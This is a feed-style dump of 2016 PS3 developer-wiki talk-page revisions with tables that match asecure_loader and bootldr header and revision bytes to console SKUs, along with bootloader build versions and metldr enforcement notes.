http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:asecure_loader&diff=41932 Talk:Flash:asecure loader 2016-06-15T12:41:43Z <p>Mathieulh: /* Per revision key */</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0x840&lt;br /&gt;NAND:0x40840&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0x844&lt;br /&gt;NAND:0x40844&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 33 24&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;97 3E 06 DE CE 4D A3 4D B5 CF 49 E4&lt;/code&gt;&amp;nbsp; || [[CEB-2030]] || 00 paired [[050.003]] isoldr<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 1F 25&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;73 47 A1 2A 11 01 B1 56 EC A0 4E 3E&lt;/code&gt;&amp;nbsp; || [[CEB-2030]] || 00 paired [[050.003]] lv1ldr<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 1A 20&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;A6 51 18 B1 29 B8 7E 8F 61 58 9F CB&lt;/code&gt;&amp;nbsp; || [[CEB-2030]] || 00 paired [[050.003]] lv2ldr<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0D 4F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;A5 4A C8 EF EE FB 19 C0 96 53 69 88&lt;/code&gt;&amp;nbsp; || [[CEB-2030]] || 00 paired [[050.003]] rvkldr<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 11 3E&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EC 39 97 BB EF FC A7 49 7E 70 52 6F&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E C0&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;66 45 66 FA 77 88 F8 43 2F B7 AA 62&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}}&lt;br /&gt;{{DECR-1000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E C3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;8C C6 E5 4B 1D 54 DB 91 22 23 39 0E&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E DD&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2F 6C 62 2E CA 7F AE 0D 2F 76 B5 D4&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || Metldr No version enforced; shipped with 1.60<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E D6&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;48 F4 3F DE 3E EE 37 11 9C 67 36 63&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{DECHA}}&lt;br /&gt;{{DECHA00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E BB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;94 C6 A3 0B BF 2F 50 75 2E 8D C0 52&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E DA&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;81 CF 2E F4 1A 33 68 97 E0 49 3C B8&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 77&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 62 F2 C2 E6 83 5D 6F C1 44 F2 46&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{GECR1100}} || first [[NOR]] {{CEX}} consoles (minver 2.30)&lt;br /&gt; Metldr No version enforced; shipped with bootldr 1.97<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 88&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;78 22 C4 1E B9 F0 0F A4 83 0A 0B 69&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 8A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5E 1F 9C ED 75 8B 6B 94 44 2B F0 31&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Metldr No version enforced; shipped with bootldr 2.10<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E A2&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E7 EA 23 78 89 AE 20 32 2A 97 08&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || Metldr No version enforced; shipped with bootldr 2.20 or 2.35<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 89&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;43 B6 EF 4A E2 0F 74 00 C8 80 9E 53&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHM}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}}&lt;br /&gt;{{DECHJ00}} || Metldr No version enforced; shipped with bootldr 2.45<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 85&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 78 B8 F0 28 79 A8 11 84 A0 DA 74&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECH2000}}&lt;br /&gt;{{DECR1400}} || Metldr No version enforced; shipped with bootldr 2.85 or 3.00<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 8E&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 87 3B C7 15 F2 80 80 9C 30 22 25&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2100}}&lt;br /&gt;{{CECH2500}} || Metldr No version enforced; shipped with 3.40<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 92&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C3 26 6E 4B BB 28 2E 76 B7 67 70 95&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || [[Dumping_Metldr#example_with_hardcoded_version_of_minver_3.50.2B_console|Metldr 3.50+ Enforced]]; shipped with bootldr 3.50<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0E 92&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;DB A5 3B 0A B5 18 1D 97 15 24 61 5B&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// http://i.imgur.com/SHRO1wC.png //--&gt; [[Dumping_Metldr#example_with_hardcoded_version_of_minver_3.50.2B_console|Metldr 3.56+ Enforced]]; shipped with bootldr 3.56<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 8E&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E D7 BC D8 1F 11 EA 34 42 5F 9B 9D&lt;/code&gt;&amp;nbsp; || {{CECH2500}}&lt;br /&gt;{{CECH3000}} || &quot;Metldr.2&quot; 3.60+ Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 8E&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;65 6E C1 D9 65 95 F8 5C 1F 9C 61 96&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || &quot;Metldr.2&quot; 3.60+ Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 8E&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;39 EC F2 D2 AC C0 E0 75 22 48 A9 F8&lt;/code&gt;&amp;nbsp; || {{CECH2500}}&lt;br /&gt;{{CECH3000}} || &quot;Metldr.2&quot; 3.60+ Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 97&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EA 83 83 71 87 8E F0 89 2A 5E F6 B6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || &quot;Metldr.2&quot; ? Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 97&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C3 6C 2E 43 00 AA CB E6 F6 4F AD 92&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || &quot;Metldr.2&quot; 3.72+ Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 97&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;A2 83 4B 1D FD 96 9C C1 76 95 17 C6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || &quot;Metldr.2&quot; ?4.10+? Enforced<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 0F 97&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C F7 14 FA 8F DF 7E F9 23 9A D2&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || &quot;Metldr.2&quot; ?4.25+? Enforced<br /> |-<br /> |}<br /> undocumented: [[SUR-00x#SURTEES-03|SURTEES-03]]</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41931 Talk:Flash:bootldr 2016-06-15T12:40:38Z <p>Mathieulh: /* Per revision key */</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 1257,12300, .........Build Data: 2006-07-06_02:22:23)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 3163,33535, .........Build Data: 2008-07-15_15:06:19)&lt;br /&gt;Only the build date strings change, the actual code is the same as the revision from 2006<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE Version //--&gt; 1.6.0 / &lt;!--// Build ID //--&gt;2040,21378 / &lt;!--// Build Date //--&gt;2007-04-17_20:46:43<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E 8C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;31 B5 9A 07 2E D4 5C B5 68 08 C2 FC&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{GECR1100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 1C&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;06 5B 86 0C 5C F7 6A C4 59 8D D7 B4&lt;/code&gt;&amp;nbsp; || {{CECHE}}&lt;br /&gt;{{CECHG}}&lt;br /&gt;{{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 1.9.7 / &lt;!--// Build ID //--&gt;2588,26593 / &lt;!--// Build Date //--&gt;2007-10-01_16:19:11 &lt;br&gt; first [[NOR]] {{CEX}} consoles (minver 2.30)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;89 EF FD 15 B3 85 0E 3B 2A 73 44 84&lt;/code&gt;&amp;nbsp; || {{CECHG}}&lt;br /&gt;{{CECHH}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;6E ED 04 A0 4E 41 53 2A C1 23 C7 18&lt;/code&gt;&amp;nbsp; || {{CECHH}} || Boot Loader SE Version 2.1.0 ...(Build ID: 2709,28222, .........Build Data: 2007-12-05_13:32:28)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E F4&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;E6 44 A0 75 B6 0B 79 96 C1 29 7A A0&lt;/code&gt;&amp;nbsp; || {{CECHJ}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;ED 4C 79 D6 5D 60 28 76 FF AD A6 FD&lt;/code&gt;&amp;nbsp; || {{CECHH}} || &lt;!--// Boot Loader SE Version //--&gt; 2.2.0 / &lt;!--// Build ID //--&gt;2883,30440 / &lt;!--// Build Date //--&gt;2008-03-18_17:28:18<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E E3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;7B 09 CB EE 00 2F AF 51 59 F8 D5 A8&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHH}}&lt;br /&gt;{{CECHK}} || &lt;!--// Boot Loader SE Version //--&gt; 2.3.5 / &lt;!--// Build ID //--&gt;3034,32025 / &lt;!--// Build Date //--&gt;2008-05-12_15:29:27<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;B1 94 34 A3 3C F1 C8 66 DF 42 0E 50&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECHP}}&lt;br /&gt;{{GECR1500}} || Boot Loader SE Version 2.4.5 ...(Build ID: 3163,33519, .........Build Data: 2008-07-14_20:31:16)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;83 EF B9 76 C4 DE D1 35 32 7C D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55)&lt;br /&gt;Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)&lt;br /&gt;Same code as 2.7.0 with build strings changes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)&lt;br /&gt;Same code as 3.3.0 Only the build version strings change.<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF A7 05 0F A2 54 7E 11 4F B2 D5 BC&lt;/code&gt;&amp;nbsp; || {{DECH4000}} || <br /> |-<br /> |}<br /> <br /> *Other bootloader versions not in the table was published in wiki pages:<br /> **http://www.psdevwiki.com/ps3/Lv0<br /> **http://www.psdevwiki.com/ps3/Lv0ldr<br /> **http://www.psdevwiki.com/ps3/Talk:Boot_Order#LV0<br /> **http://www.psdevwiki.com/ps3/Talk:Playstation_Update_Package_%28PUP%29#known_updates<br /> **http://www.psdevwiki.com/ps3/index.php?search=+%09Boot+Loader+SE+Version&amp;title=Special%3ASearch&amp;go=Go (wiki search)</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:Flash:bootldr&diff=41429 Talk:Flash:bootldr 2016-03-31T20:14:13Z <p>Mathieulh: /* Per revision key */ added more details.</p> <hr /> <div>== Per revision key ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! &lt;abbr title=&quot;datasize=(header*0x10)+0x40&quot;&gt;header&lt;/abbr&gt;&lt;small&gt;&lt;br /&gt;NOR:0xFC0000&lt;br /&gt;NAND:0x0&lt;/small&gt; !! rev&lt;small&gt;&lt;br /&gt;NOR:0xFC0004&lt;br /&gt;NAND:0x4&lt;/small&gt; !! SKU !! notes<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 28 BE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C0 2E 2F EA F6 1C A6 F1 CC C8 8B 5F&lt;/code&gt;&amp;nbsp; || {{CEB-2030}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2C FE&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;80 5B F2 D9 AC D2 00 61 B6 99 BB 96&lt;/code&gt;&amp;nbsp; || {{DEH-Z1010}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;44 48 90 DD 19 2C 91 2D BB 99 6F C8&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 1257,12300, .........Build Data: 2006-07-06_02:22:23)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 80&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F2 C2 E4 E5 CC 02 FB 99 7C 50 90 82&lt;/code&gt;&amp;nbsp; || {{DECR-1000}} || Boot Loader SE Version 0.8.5 ...(Build ID: 3163,33535, .........Build Data: 2008-07-15_15:06:19)&lt;br /&gt;Only the build date strings change, the actual code is the same as the revision from 2006<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 7F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;12 1D 73 39 4A F2 98 81 F8 D6 B1 8C&lt;/code&gt;&amp;nbsp; || {{DEH-H1001-D}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 1A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;99 02 B3 13 C2 80 B8 35 AA 03 3F FE&lt;/code&gt;&amp;nbsp; || {{DEH-H1000A-E}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;5C E4 63 CD 5C 9E B6 7A FE A0 1B 54&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHB}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 2A&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1C 21 81 C8 EA 41 86 5C 8B 33 8A EF&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{DECHA}} || Boot Loader SE Version 1.0.0 ...(Build ID: 1673,16934, .........Build Data: 2006-10-30_12:39:57)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 44&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;3F F1 1F 14 C3 42 44 3C 88 B1 8E 90&lt;/code&gt;&amp;nbsp; || {{CECHC}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F9 96 D8 4E 1A 9D 50 BF 97 F4 A0 CE&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1798,18531, .........Build Data: 2007-01-10_12:09:26)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 37&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BC 30 D5 52 4B 74 99 65 CF 95 AE 5F&lt;/code&gt;&amp;nbsp; || {{CECHC}} || Boot Loader SE Version 1.5.0 ...(Build ID: 1943,19890, .........Build Data: 2007-02-22_15:52:05)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2A 3F&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;04 AD 56 18 64 8D 49 94 23 8F B8 A1&lt;/code&gt;&amp;nbsp; || {{CECHA}}&lt;br /&gt;{{CECHC}}&lt;br /&gt;{{CECHE}} || &lt;!--// Boot Loader SE 